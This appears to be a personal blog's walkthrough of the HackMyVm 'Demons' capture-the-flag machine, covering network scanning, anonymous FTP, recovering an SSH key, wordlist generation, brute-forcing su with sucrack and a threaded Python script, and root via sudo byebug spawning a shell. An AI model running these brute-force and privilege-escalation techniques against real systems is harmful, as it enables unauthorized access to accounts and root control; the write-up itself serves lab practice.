Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Demons Walkthrough

HackMyVm Demons Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Demons


Find IP of the machine.

 ~ sudo arp-scan --interface eth1 192.168.56.0/24                             
 ...
 192.168.56.218  08:00:27:71:4c:b6       PCS Systemtechnik GmbH


Scan ports.

 ~ nmap -sV -sC -p- 192.168.56.218  -oN ports.log   
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-21 08:42 CST
 Nmap scan report for 192.168.56.218
 Host is up (0.00090s latency).
 Not shown: 65532 closed ports
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     vsftpd 3.0.3
 |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
 | ftp-syst:
 |   STAT:
 | FTP server status:
 |      Connected to 192.168.56.150
 |      Logged in as ftp
 |      TYPE: ASCII
 |      No session bandwidth limit
 |      Session timeout in seconds is 300
 |      Control connection is plain text
 |      Data connections will be plain text
 |      At session startup, client count was 2
 |      vsFTPd 3.0.3 - secure, fast, stable
 |_End of status
 22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 | ssh-hostkey:
 |   3072 5e:44:8a:b1:77:0c:42:79:16:64:8d:af:b4:78:bb:b4 (RSA)
 |   256 cb:0f:a7:df:7f:23:78:5a:08:e3:4f:b6:43:7c:11:84 (ECDSA)
 |_  256 a0:4a:26:bf:40:08:68:c2:b1:04:88:b4:8b:a2:45:2f (ED25519)
 80/tcp open  http    Apache httpd 2.4.48 ((Debian))
 |_http-server-header: Apache/2.4.48 (Debian)
 |_http-title:  DemonsCloseCall
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel


Login ftp anonymous, download DemonsVBAMacroTools.mdb.

 ftp> cd .toolsHidden
 250 Directory successfully changed.
 ftp> ls -la
 200 PORT command successful. Consider using PASV.
 150 Here comes the directory listing.
 drwxrwxrwx    2 0        0            4096 Sep 16 15:17 .
 drwxr-xr-x    3 0        115          4096 Sep 16 15:18 ..
 -rw-r--r--    1 0        0              55 Sep 10 17:21 .what
 -rw-------    1 1000     1000        12018 Sep 10 17:19 DemonsCellsDogma.xlsx
 -rwxrwxrwx    1 1000     1000       339968 Sep 16 15:17 DemonsVBAMacroTools.mdb


Use Access to open it, there is a VBA module which is password protected.





Google the way to bypass the password. Then we can view the source code.



Save the ssh key to key.txt.

Enum port 80. At http://ip/hell, get 2 usernames.


Try login as aim with the private key.

 ~ ssh aim@192.168.56.218 -i key.txt      
 Last login: Tue Sep 21 04:52:35 2021 from 192.168.56.150
 aim@Demons:~$ id
 uid=1001(aim) gid=1001(aim) groups=1001(aim)


Found an image in /home/aim, named key8_8.jpg. This the the hint for password of another user agares.


Check the keyboard image, "34odfnm" is different. This means the dic contains only these 7 letters/numbers.

8_8 may means password length is 8. We should use "crunch 8 8"

So, first we generate a dic with crunch, which contains 5764801 words.

 ~ crunch 8 8 dfnmo34 > tmp.txt                               
 0
 Crunch will now generate the following amount of data: 51883209 bytes
 49 MB
 0 GB
 0 TB
 0 PB
 Crunch will now generate the following number of lines: 5764801


Because the password contain's all 7 letter/numbers, so there is one and only one letter/number appears twice.

Then we use a script to make the dic smaller. (Thanks avijneyam#8394 for the script )

 with open("tmp.txt") as f:
     lines = f.read().splitlines()
 
 data = []
 
 for line in lines:
     uline = list(set([i for i in line]))
 
     counts = []
     for char in uline:
         counts.append(line.count(char))
     counts.sort()
 
     if counts[-1] == 2 and counts[-2] == 1:
         data.append(line)
 
 data = "\n".join(data)
 
 with open("dic.txt", "w") as f1:
     f1.write(data)


The new dic contains only 141119 words. (Also a big one.)

 ~ wc -l dic.txt
 141119 dic.txt


Then we need to brute force su to get the right password of agares.

There is a tool named sucrack at github.

https://github.com/hemp3l/sucrack


sucarck  takes about 18 mins. (With 100 threads. Too many threads causes error.)

 aim@Demons:~$ time ./sucrack -a -w 100 -u agares dic.txt 
 password is: xxxxxxxx
 
 real    18m19.760s
 user    11m7.012s
 sys     4m59.095s


We can also make a python script to do the bruteforce. But the speed is mush slower than sucrack.

#!/usr/bin/python3
import threading
from subprocess import PIPE,STDOUT,Popen

threads = []
t_nums = 100  #number of threads

global correct_pass
correct_pass = ""
global current  #current count of passwords
current = 0
global total  #total count of passwords
total = 0


def crack_thread(*pass_list):
    #threads of cracking su
    global correct_pass
    global current
    global total
    for pwd in pass_list:
        if(len(correct_pass) > 0):  #correct_pass has been found, exit thread
            return
        current += 1
        print(f"{current}/{total}",end="\r")
        p = Popen(['su','agares'],stdin=PIPE,stdout=PIPE,stderr=STDOUT)
        try:
            res=p.communicate(f"{pwd}\nid".encode("utf-8"))
        except:
            p.terminate()
            continue
        if(str(res).find("agares")) != -1:
            print(f"\nPassword is {pwd}\n")
            correct_pass = pwd
            return
    return

with open('mini.txt','r') as passfile:
    passes = passfile.readlines()
    total = len(passes)

    t_size = total // t_nums  #passwords count of each thread
    t_last = total % t_nums   #if mod is not 0, there will be another thread

    for i in range(t_nums):
        passblk = passes[i*t_size:(i+1)*t_size]
        t=threading.Thread(target=crack_thread,args=passblk)
        threads.append(t)
    if t_last>0:
        passblk = passes[t_size*t_nums:]
        t=threading.Thread(target=crack_thread,args=passblk)
        threads.append(t)
    for t in threads:
        t.setDaemon(True)
        t.start()
    for t in threads:
        t.join()
aim@Demons:~$ time python3 mt.py
126758/141120
Password is xxxxxxxx



real    185m22.898s
user    98m29.009s
sys     62m7.093s


Check sudo -l as user agares.

agares@Demons:/home/aim$ sudo -l
[sudo] password di agares:
Corrispondenza voci Defaults per agares su Demons:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
L'utente agares può eseguire i seguenti comandi su Demons:
    (ALL : ALL) /bin/byebug


It's easy to get root now.

agares@Demons:~$ echo 'system("/bin/sh")' > tmp.rb
agares@Demons:~$ sudo byebug tmp.rb

[1, 1] in /home/agares/tmp.rb                     
=> 1: system("/bin/sh")
(byebug) continue
# id;hostname
uid=0(root) gid=0(root) gruppi=0(root)
Demons




发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.1